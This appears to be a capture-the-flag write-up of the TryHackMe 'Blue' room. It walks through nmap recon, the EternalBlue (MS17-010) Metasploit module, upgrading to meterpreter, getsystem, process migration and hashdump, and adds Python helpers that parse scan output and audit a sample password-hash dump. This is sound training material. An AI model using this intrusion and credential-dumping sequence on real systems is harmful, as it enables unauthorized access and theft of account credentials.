Create a directory for the machine on the Desktop, plus a subdirectory for the nmap scans.

# Redirection with plain "sudo echo ... >>" runs as the unprivileged user, so use tee -a to append as root
echo "10.10.33.26 blue.thm" | sudo tee -a /etc/hosts
mkdir -p thm/blue
cd thm/blue
# At the end of the room:
# remove the last line (our entry) from the /etc/hosts file again
sudo sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target; this checks connectivity and gives a first hint about the operating system.
Sending these three ICMP echo requests, we see that the Time To Live (TTL) is ~128 secs. This indicates that the target is a Windows system, while *nix systems usually have a TTL of 64 secs. The value actually observed in the replies is one below the initial value (127, as the nmap output below also shows), because every router hop on the path decrements the TTL by one.
1.2 - How many services are running under port 1000?
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
The Windows 7 SP1 SMB service is affected by Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010), https://www.exploit-db.com/exploits/42315; the same entry can also be found offline with searchsploit (CLI).
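The two recon steps above (reading the OS from the ping TTL, and counting open services under port 1000 in the nmap output) are easy to automate. The following is an added example, not code from the original writeup or from the TryHackMe room; the ping and nmap output it parses is constructed sample text, so the counts it produces are for the sample and not the answer for this machine. The mapping of initial TTL values to operating-system families is the usual rule of thumb (64 for Linux/Unix, 128 for Windows, 255 for many network devices and Solaris), with an allowance for the hops that decrement the TTL on the way.

```python
import re

# Constructed sample ping output (not captured from the original page's target)
PING_OUTPUT = """\
PING blue.thm (10.10.33.26) 56(84) bytes of data.
64 bytes from 10.10.33.26: icmp_seq=1 ttl=127 time=35.2 ms
64 bytes from 10.10.33.26: icmp_seq=2 ttl=127 time=34.9 ms
64 bytes from 10.10.33.26: icmp_seq=3 ttl=127 time=35.0 ms
"""

# Constructed sample nmap -sV output lines (only the 445/tcp line resembles the page's)
NMAP_OUTPUT = """\
PORT      STATE  SERVICE       REASON          VERSION
135/tcp   open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open   netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds  syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open   ms-wbt-server syn-ack ttl 127
49152/tcp open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
"""

# Typical initial TTL values per OS family (rule of thumb, not a guarantee)
INITIAL_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "Network device/Solaris"}


def observed_ttls(ping_output):
    """Extract every ttl=N value from ping output, in order."""
    return [int(m) for m in re.findall(r"\bttl=(\d+)", ping_output)]


def guess_os_from_ttl(ttl, max_hops=30):
    """Return (os_family, hops) for the smallest initial TTL at or above the
    observed value, assuming at most max_hops routers decremented it."""
    for initial in sorted(INITIAL_TTLS):
        if ttl <= initial and initial - ttl <= max_hops:
            return INITIAL_TTLS[initial], initial - ttl
    return "unknown", None


def parse_nmap_ports(nmap_output):
    """Parse 'PORT STATE SERVICE' rows from normal nmap output into dicts."""
    ports = []
    for line in nmap_output.splitlines():
        m = re.match(r"(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)", line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4)})
    return ports


def count_open_below(ports, limit=1000):
    """Count open ports strictly below the given port number."""
    return sum(1 for p in ports if p["state"] == "open" and p["port"] < limit)


if __name__ == "__main__":
    ttls = observed_ttls(PING_OUTPUT)
    print("observed TTLs:", ttls, "->", guess_os_from_ttl(ttls[0]))
    ports = parse_nmap_ports(NMAP_OUTPUT)
    print("open services under port 1000:", count_open_below(ports))
```

The hop allowance matters in practice: a target several routers away still reports a TTL in the 120s, which the nearest-initial-value lookup still maps to Windows rather than reporting "unknown".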
MS17-010
Task 2 - Gain Access
2.1 - Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
Start Metasploit:

msfconsole -q
msf6 > search ms17-010

Matching Modules
================

   #  Name                                       Disclosure Date  Rank     Check  Description
   -  ----                                       ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue   2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec        2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command       2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                          normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce   2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
exploit/windows/smb/ms17_010_eternalblue
2.2 - Show options and set the one required value. What is the name of this value? (All caps for submission)
3.1 - Convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade
3.2 - Select this (use MODULE_PATH). Show options, what option are we required to change?
3.3 - Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
meterpreter > migrate 1068
[*] Migrating from 1364 to 1068...
[*] Migration completed successfully.
meterpreter > migrate 1704
[*] Migrating from 1068 to 1704...
meterpreter > migrate 1688
[*] Migrating from 1068 to 1688...
[*] Migration completed successfully.
Task 4 - Cracking
4.1 - Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Jon
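hashdump prints one line per local account in the pwdump format user:RID:LM-hash:NT-hash:::, and picking the non-default user out of it by eye is what question 4.1 asks. The following added example (not code from the original writeup) parses that format and, from an auditing angle, also flags two weaknesses the same dump reveals: accounts whose NT hash is the well-known hash of the empty password, and accounts whose LM field is anything other than the well-known "no LM hash" marker, which means the host still stores the weak LM hash. The dump it reads is constructed sample text with placeholder NT hashes; only the two empty-password constants are real, publicly known values.

```python
# Publicly known hashes of the empty password (real constants)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Built-in local accounts present on every Windows install (RID 500 and 501)
DEFAULT_ACCOUNTS = {"administrator", "guest"}

# Constructed sample dump; the NT hashes marked below are placeholders, not real hashes
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
legacy:1001:00112233445566778899aabbccddeeff:0011223344556677889900aabbccddeeff:::
"""


def parse_hashdump(text):
    """Parse pwdump-style lines into dicts; skip anything that is not 4+ fields."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def audit_accounts(accounts):
    """Return the non-default users plus two weakness findings."""
    return {
        "non_default": [a["user"] for a in accounts
                        if a["user"].lower() not in DEFAULT_ACCOUNTS],
        "empty_password": [a["user"] for a in accounts if a["nt"] == EMPTY_NT],
        "lm_hash_stored": [a["user"] for a in accounts if a["lm"] != EMPTY_LM],
    }


if __name__ == "__main__":
    findings = audit_accounts(parse_hashdump(SAMPLE_HASHDUMP))
    for key, users in findings.items():
        print(f"{key}: {', '.join(users) or '-'}")
```

On the sample dump the non-default users are Jon and the constructed "legacy" account; Guest shows up as having an empty password (normal for a disabled Guest account), and "legacy" is the one host where an LM hash is still being stored.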
4.2 - Copy this password hash to a file and research how to crack it. What is the cracked password?